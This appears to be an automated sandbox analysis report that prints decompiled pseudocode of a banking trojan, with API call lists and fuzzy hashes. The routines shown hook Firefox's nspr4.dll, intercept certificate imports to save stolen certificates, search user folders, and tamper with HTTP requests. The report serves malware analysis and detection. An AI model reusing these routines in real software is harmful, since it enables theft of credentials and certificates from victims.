    				_v5 = 0;
    				if(_a8 <= 0xa00000) {
    					_t26 = E0040C189( *__esi);
    					_v36 = _t26;
    					_v32 = _t46;
    					if((_t26 & _t46) != 0xffffffff && E0040C169( *__esi, 0, 0, 2) != 0) {
    						_t29 = E0040C189( *__esi);
    						_v28 = _t29;
    						_v24 = _t46;
    						if((_t29 & _t46) != 0xffffffff) {
    							E00406F38( &_v20,  &_v20, 0, 5);
    							_v20 = __esi[4] ^ _a8;
    							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
    								E0040C169( *_t48, _v28, _v24, 0);
    								SetEndOfFile( *_t48);
    							} else {
    								_v5 = 1;
    							}
    						}
    						FlushFileBuffers( *_t48);
    						E0040C169( *_t48, _v36, _v32, 0);
    					}
    				}
    				return _v5;
    			}

    APIs
      • Part of subcall function 0040C189: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 0040C19E
      • Part of subcall function 0040C169: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,0040CE15,?,00000000,00000000,00000000,00000000), ref: 0040C17B
    • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040CEBD
    • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0040CED6
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040CEFA
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040CF02
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: c5379564bad4dd386b5a2495c6e3d046866d5d9fe11b22cda77f48e8f82b74bb
    • Instruction ID: 93010ba2da4dc1e0dfd54e82171d2f394ebba80b71a0dbbe3980b9e71f15489b
    • Opcode Fuzzy Hash: c5379564bad4dd386b5a2495c6e3d046866d5d9fe11b22cda77f48e8f82b74bb
    • Instruction Fuzzy Hash: F3314A76800109EFDF119FA5CC81EAEBBB9EF08384F10863AF551B51A1D33A8955DF68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405723(void* __ebx, void* __ecx) {
    				char _v20;
    				char* _v84;
    				char _v92;
    				char _v196;
    				char _v716;
    				void* __edi;
    				void* __esi;
    				void* _t15;
    				void* _t31;
    				void* _t35;
    				void* _t36;
    				char _t37;
    				void** _t43;
    
    				_t36 = __ecx;
    				_t35 = __ebx;
    				_t15 =  *(__ebx + 0x180);
    				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
    					_t43 = _t35 + 0x17c;
    					E00408894(_t43);
    					E004131E9(_t36,  &_v716, 1);
    					E00412E8D(0x2937498d,  &_v196, 0);
    					_t37 = 0x44;
    					E00406F38( &_v92,  &_v92, 0, _t37);
    					_v92 = _t37;
    					_v84 =  &_v196;
    					ResetEvent( *(_t35 + 0xc));
    					if(E0040874C( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
    						E00406EC1(_t43,  &_v20, 0x10);
    						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
    							goto L6;
    						} else {
    							TerminateProcess( *_t43, 0);
    							E00408894(_t43);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t31 = 0;
    					}
    				} else {
    					L6:
    					_t31 = 1;
    				}
    				return _t31;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040573B
    • ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00405795
    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,00401638,00000000,?,?), ref: 004057D1
    • TerminateProcess.KERNEL32(?,00000000), ref: 004057DE
      • Part of subcall function 00408894: CloseHandle.KERNEL32(?,74B5F560,0040D90F,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004088A3
      • Part of subcall function 00408894: CloseHandle.KERNEL32(?,74B5F560,0040D90F,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004088AC
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
    • String ID:
    • API String ID: 401097067-0
    • Opcode ID: b612ae6249f92741dd2190aef78ac0784b6fb4947c3c514d602ab6cdc24da0a6
    • Instruction ID: 5f87e883b2b3177ed601a7f3bf79e4bf6e6d020a5c34226df78a0c494310a20e
    • Opcode Fuzzy Hash: b612ae6249f92741dd2190aef78ac0784b6fb4947c3c514d602ab6cdc24da0a6
    • Instruction Fuzzy Hash: 4D119071501208AAEB10ABA5DC49FEF7B7CEB44704F00457AF505F70E5DA389946DA28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00413ECC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
    				void* __edi;
    				void* _t12;
    				intOrPtr _t13;
    				void* _t16;
    				void* _t17;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				intOrPtr _t24;
    				void* _t28;
    				intOrPtr* _t29;
    				intOrPtr _t31;
    
    				if(E00412FEE() != 0) {
    					_t29 = _a16;
    					_t24 = _a12;
    					_t12 =  *0x42399c(_a4, 0, _t24, _t29, _t23, _t28, _t17);
    					_t13 =  *0x423998(_a4, _a8, _t24, _t29);
    					_a4 = _t13;
    					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
    						EnterCriticalSection(0x4237dc);
    						if(( *0x423774 & 0x00000001) == 0) {
    							_t31 =  *_t29;
    							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
    								_t16 = 0;
    							} else {
    								_t16 = E00404F4F(_t21, _t22, _t31);
    							}
    							if(_t16 != 0) {
    								 *0x423774 =  *0x423774 | 0x00000001;
    							}
    						}
    						LeaveCriticalSection(0x4237dc);
    					}
    					return _a4;
    				}
    				goto ( *0x423998);
    			}

    APIs
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • EnterCriticalSection.KERNEL32(004237DC), ref: 00413F23
    • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00413F3D
    • LeaveCriticalSection.KERNEL32(004237DC), ref: 00413F5E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
    • String ID: nspr4.dll
    • API String ID: 3081114022-741017701
    • Opcode ID: f3c2e126582a8555bc95f3e8ed7ae749dfd28fed2c28952debb9dec33471f41a
    • Instruction ID: 4f1f7c99a1705e70d76c65e7b08eb332ec2c2b6aab07270581c39f9b6d14fb07
    • Opcode Fuzzy Hash: f3c2e126582a8555bc95f3e8ed7ae749dfd28fed2c28952debb9dec33471f41a
    • Instruction Fuzzy Hash: 5E11BFB1601315BBCB206F159C48AD77B79EB85756F00406AFC08A7261C778AAC3C69C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415670(void* __eflags) {
    				void* _t1;
    				void* _t2;
    				void* _t3;
    				long _t6;
    				void* _t11;
    
    				_t1 = E00412EC8(_t11, __eflags, 0x19367401, 1);
    				_t19 = _t1;
    				if(_t1 != 0) {
    					_t2 = E00412FEE();
    					__eflags = _t2;
    					if(_t2 != 0) {
    						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    						_t6 = WaitForSingleObject( *0x423e2c, 0x1388);
    						while(1) {
    							__eflags = _t6 - 0x102;
    							if(_t6 != 0x102) {
    								goto L6;
    							}
    							E00405F8D();
    							_t6 = WaitForSingleObject( *0x423e2c, 0x1388);
    						}
    					}
    					L6:
    					E0040A658(_t19);
    					_t3 = 0;
    					__eflags = 0;
    				} else {
    					_t3 = _t1 + 1;
    				}
    				return _t3;
    			}

    APIs
      • Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9
    • GetCurrentThread.KERNEL32 ref: 0041569A
    • SetThreadPriority.KERNEL32(00000000), ref: 004156A1
    • WaitForSingleObject.KERNEL32(00001388), ref: 004156B9
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
    • String ID:
    • API String ID: 3441234504-0
    • Opcode ID: ebe71c8a04fd62e634b9f8549800036c24110126270438806f8020d8fdf38178
    • Instruction ID: 8856efe24afbe0ce5ffe0e191701666c9b843376c9924439151da76e30573083
    • Opcode Fuzzy Hash: ebe71c8a04fd62e634b9f8549800036c24110126270438806f8020d8fdf38178
    • Instruction Fuzzy Hash: CEF046722047086AC7113BB1AC04CEB762CC745365BA00237FC54F21E1ECAA4C5146ED
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A5F2(HANDLE* _a4) {
    				struct tagMSG _v28;
    				long _t16;
    
    				while(1) {
    					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
    					if(_t16 != 1) {
    						break;
    					}
    					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
    						if(_v28.message != 0x12) {
    							TranslateMessage( &_v28);
    							DispatchMessageW( &_v28);
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t16;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageMultipleObjectsPeekWait
    • String ID:
    • API String ID: 3986374578-0
    • Opcode ID: 1c819ff9606d79a38cd46250d563fd51c893cbd31e328ff33980bb2b3168b344
    • Instruction ID: 5a9855ad5093bdb2e66b492254d63bb9eaffbf2843b7dd2374db26d7cf6c4ea2
    • Opcode Fuzzy Hash: 1c819ff9606d79a38cd46250d563fd51c893cbd31e328ff33980bb2b3168b344
    • Instruction Fuzzy Hash: E4F0FC321043086FD710AAA9DD48D67BBBCEB45354F08093BFA51F21B1D5769814877A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E0041A746(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
    				char _v536;
    				char _v600;
    				char _v728;
    				char _v744;
    				struct _SYSTEMTIME _v760;
    				intOrPtr _v764;
    				intOrPtr _v772;
    				intOrPtr _v776;
    				char _v784;
    				void* __edi;
    				void* __esi;
    				void* _t47;
    				void* _t58;
    				intOrPtr* _t59;
    				void* _t61;
    				void* _t65;
    				intOrPtr* _t66;
    				void* _t67;
    				void* _t71;
    				char* _t74;
    				signed int _t76;
    				void* _t78;
    				void* _t79;
    
    				_t61 = __ecx;
    				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
    				_t59 = _a4;
    				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
    				_v776 = __eax;
    				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00412FEE() != 0) {
    					GetSystemTime( &_v760);
    					E00405B00(0xaa,  &_v600);
    					_t74 =  &_v744;
    					E00405B00(0xab, _t74);
    					E0041A525( &_v536, _t61);
    					_push(_v760.wYear & 0x0000ffff);
    					_push(_v760.wMonth & 0x0000ffff);
    					_push(_v760.wDay & 0x0000ffff);
    					_push(_t74);
    					_push( &_v536);
    					_push( &_v600);
    					_t65 = 0x3e;
    					_t47 = E00407B78( &_v600, _t65,  &_v728);
    					_t79 = _t78 + 0x18;
    					if(_t47 > 0 && E0040EB83(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
    						_t66 = _a8;
    						if(_t66 != 0 &&  *_t66 != 0) {
    							 *((short*)(E00406EC1(_t79 + 0x48 + E004079D4( &_v728) * 2, L".txt", 8) + 8)) = 0;
    							_t64 = _t66;
    							if(E00407CDC(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
    								E0040EB83(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
    								E00407CCA( &_v784);
    							}
    						}
    					}
    				}
    				return _v776;
    			}

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 0041A75F
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • GetSystemTime.KERNEL32(?), ref: 0041A7AB
      • Part of subcall function 0041A525: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041A67C,?,?,00000000), ref: 0041A53A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
    • String ID: .txt
    • API String ID: 1412380219-2195685702
    • Opcode ID: f566a454caf9e8f9e921a29173e374277857e00abc44d241254b0ed5d9a9ba4e
    • Instruction ID: 503c0de1727f8a5534691f1ebefe36c3478e62f0d344488bed1c0413f2a2ea0d
    • Opcode Fuzzy Hash: f566a454caf9e8f9e921a29173e374277857e00abc44d241254b0ed5d9a9ba4e
    • Instruction Fuzzy Hash: D131B231104344AADB20FF55CD05BEBB7A8EF84344F04492AB994A7291EB38DE96C767
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(00404B20,00000000,00004401,00404B30,?,?,00000000,00000001), ref: 00416F79
    • CoCreateInstance.OLE32(00404AF0,00000000,00004401,00404B00,?,?,00000000,00000001), ref: 00416FCC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID: D
    • API String ID: 542301482-2746444292
    • Opcode ID: 970946bdea44795e7aab95972482dbb334eff71c9e399e3fbb1411042e4c7d0b
    • Instruction ID: ce0df35bbdf105edde795c913fede2154c2d2aec1c1e4c505b309fa7ebfb4f68
    • Opcode Fuzzy Hash: 970946bdea44795e7aab95972482dbb334eff71c9e399e3fbb1411042e4c7d0b
    • Instruction Fuzzy Hash: 0E316DB2204305AFD710DF54DC85EABB7ECAF84744F11092EFA5497290E774EC468BAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004124FF(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				char _v16;
    				char _v368;
    				char _v508;
    				void* __edi;
    				signed int _t17;
    				signed int _t18;
    				int _t29;
    				void* _t35;
    
    				if( *0x423778 == 0) {
    					E00413277(0x42375c, __ecx, 2, 0x423778);
    				}
    				_v8 = _v8 & 0x00000000;
    				_t31 =  &_v12;
    				_t29 = 0;
    				_v12 = 0x80000001;
    				_t17 = RegOpenKeyExW(0x80000001, 0x423778, 0, 1,  &_v12);
    				if(_t17 != 0) {
    					_t18 = _t17 | 0xffffffff;
    				} else {
    					_t18 = E0040B158( &_v12, 0x42375c,  &_v16,  &_v8);
    				}
    				_t35 = 0x74;
    				if(_t18 == 0xffffffff) {
    					L10:
    					return E00406F38(_t18, _a4, 0, _t35);
    				}
    				if(_v16 == 3 && _t18 >= _t35) {
    					E00406EC1(_a4, _v8, _t35);
    					E00413194(_t31,  &_v508);
    					E00408301( &_v368, _t31, _a4, _t35);
    					_t29 = 1;
    				}
    				_t18 = E00406E85(_v8);
    				if(_t29 == 0) {
    					goto L10;
    				}
    				return _t18;
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,00423778,00000000,00000001,?,?,74B5F560,00000000), ref: 00412541
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open
    • String ID: \7B$x7B
    • API String ID: 71445658-1060299144
    • Opcode ID: cee52ac73add73a247d6a569c2ce561b21995ff08de37a7a3c6fd802d6314bbf
    • Instruction ID: 87d1833207da097aee0b407269a63c5ad20d8ade6aeba6188d5e4015ba7086f1
    • Opcode Fuzzy Hash: cee52ac73add73a247d6a569c2ce561b21995ff08de37a7a3c6fd802d6314bbf
    • Instruction Fuzzy Hash: C111E171A40218B6CF20AB65DD85FEF7B7A9F013A4F108167F408B61D0C7BD4B958B98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041475F(struct HINSTANCE__* __eax) {
    				char _v8;
    				char _v20;
    				char _v108;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t11;
    				void* _t18;
    				signed int _t25;
    				short* _t33;
    				void* _t43;
    
    				_t11 = __eax;
    				_t33 = __eax;
    				if( *0x423bd4 > 1) {
    					_t11 = GetModuleHandleW(L"nspr4.dll");
    					if(_t11 != 0) {
    						if(_t33 == 0 ||  *_t33 == 0) {
    							return E004144F1(__eflags, 0);
    						}
    						_t11 = E00406E6D(2 + E004079D4(_t33) * 4);
    						_t31 = _t11;
    						if(_t11 != 0) {
    							_t25 = E00407CDC(E00407D91(_t33, _t31) | 0xffffffff, _t31,  &_v20);
    							_t11 = E00406E85(_t31);
    							if(_t25 != 0) {
    								_t18 = 0x31;
    								E00405ACA(_t18,  &_v108);
    								_t6 =  &_v8; // 0x412a34
    								_t43 = E00407C49(_t6,  &_v108, _v20);
    								_t11 = E00407CCA( &_v20);
    								_t44 = _t25 & 0xffffff00 | _t43 > 0x00000000;
    								if((_t25 & 0xffffff00 | _t43 > 0x00000000) != 0) {
    									_t9 =  &_v8; // 0x412a34
    									E004144F1(_t44,  *_t9);
    									return E00406E85(_v8);
    								}
    							}
    						}
    					}
    				}
    				return _t11;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(nspr4.dll,00000000,77E49EB0,00000000), ref: 0041477C
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
      • Part of subcall function 004144F1: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00414518
      • Part of subcall function 004144F1: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041456C
      • Part of subcall function 004144F1: GetPrivateProfileIntW.KERNEL32 ref: 004145CF
      • Part of subcall function 004144F1: GetPrivateProfileStringW.KERNEL32 ref: 004145FB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$AttributesFileFolderFreeHandleHeapModulePathString
    • String ID: 4*A$nspr4.dll
    • API String ID: 119068519-2715847660
    • Opcode ID: 4c3c916a6ffdca68ea9e1f0646becbada49e403290f1aa60f67a431b648ccebb
    • Instruction ID: a3888d5cbdeeeaecb781db45b67cc6614bb4e67edf723622deba3b7787aaffa7
    • Opcode Fuzzy Hash: 4c3c916a6ffdca68ea9e1f0646becbada49e403290f1aa60f67a431b648ccebb
    • Instruction Fuzzy Hash: 9E11E335E002546AEB2177BA9C027EE77699FC0B44F08403BF801B32E6DB7C9D848299
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00418CA8(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v572;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v52;
    				E00405B00(0x81, _t32);
    				_v16 = _t32;
    				_v28 = 0x26;
    				_v24 = 0x1a;
    				_v20 = 0x23;
    				E00406F38( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v572;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E0040C5AE( &_v572,  &_v16, _t37, 1, 2, E00418A0D,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E00406E85(_v12);
    				}
    				return E00416CBC(_t29, _v12, 0xcb);
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00418CF8
      • Part of subcall function 0040C5AE: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C5ED
      • Part of subcall function 0040C5AE: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040C614
      • Part of subcall function 0040C5AE: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040C65E
      • Part of subcall function 0040C5AE: Sleep.KERNEL32(00000000,?,?), ref: 0040C6BB
      • Part of subcall function 0040C5AE: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040C6E9
      • Part of subcall function 0040C5AE: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040C6FB
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: 2c85fbde6590643331e1ae873c28b813139d4189f7727ad630e6ddb1917396cd
    • Instruction ID: de68c4486bc0f50377f406a7e632938b55bb66278a2a036bebcf459e8be7e9a3
    • Opcode Fuzzy Hash: 2c85fbde6590643331e1ae873c28b813139d4189f7727ad630e6ddb1917396cd
    • Instruction Fuzzy Hash: F7115E76A01228BADB20AB96DC09FDF7A79EF41344F00416AB505B6180DB785B86CBE5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004195C9(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v60;
    				char _v580;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v60;
    				E00405B00(0x95, _t32);
    				_v16 = _t32;
    				_v28 = 0x26;
    				_v24 = 0x1a;
    				_v20 = 0x23;
    				E00406F38( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v580;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E0040C5AE( &_v580,  &_v16, _t37, 1, 2, E0041933A,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E00406E85(_v12);
    				}
    				return E00416CBC(_t29, _v12, 0xcb);
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00419619
      • Part of subcall function 0040C5AE: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C5ED
      • Part of subcall function 0040C5AE: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040C614
      • Part of subcall function 0040C5AE: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040C65E
      • Part of subcall function 0040C5AE: Sleep.KERNEL32(00000000,?,?), ref: 0040C6BB
      • Part of subcall function 0040C5AE: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040C6E9
      • Part of subcall function 0040C5AE: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040C6FB
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: 40a10c756f0eead891361828f848d19ebaf898b36ca40d84b786715c17e6d6b5
    • Instruction ID: c86ea3206bbd780e0a150e6185af3eebba036b9bc12448631b4d985f2f3524ed
    • Opcode Fuzzy Hash: 40a10c756f0eead891361828f848d19ebaf898b36ca40d84b786715c17e6d6b5
    • Instruction Fuzzy Hash: 42117075A01128BADB209B96DC49FDFBF7CEF41754F00406AFA05B6180D2785A85CBE9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E0041CC8A(void* __ecx, void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
    				char _v20;
    				char _v24;
    				long _v32;
    				char* _v36;
    				char _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				struct _GOPHER_FIND_DATAA _t22;
    				int _t23;
    				void* _t30;
    				intOrPtr _t31;
    
    				_t30 = __ecx;
    				if(E00412FEE() == 0) {
    					_t22 = _a8;
    					L9:
    					_t23 = HttpSendRequestExA(_a4, _t22, _a12, _a16, _a20);
    					L10:
    					return _t23;
    				}
    				_push(0x28);
    				_t39 = _a8;
    				if(_a8 != 0) {
    					_push(_a8);
    					_push( &_v44);
    					E00406EC1();
    					__eflags = _v44;
    					if(__eflags != 0) {
    						__eflags = _v36;
    						if(__eflags != 0) {
    							HttpAddRequestHeadersA(_a4, _v36, _v32, 0xa0000000);
    							_v52 = 0;
    							_v48 = 0;
    						}
    					}
    				} else {
    					_pop(_t31);
    					E00406F38( &_v44,  &_v44, 0, _t31);
    					_v56 = _t31;
    				}
    				_t23 = E0041C91F(_t30, _t39, _a4,  &_v24,  &_v20);
    				if(_t23 != 0xffffffff) {
    					goto L10;
    				} else {
    					_t22 =  &_v44;
    					goto L9;
    				}
    			}

    APIs
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 0041CCDE
    • HttpSendRequestExA.WININET(?,?,?,?,?), ref: 0041CD19
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
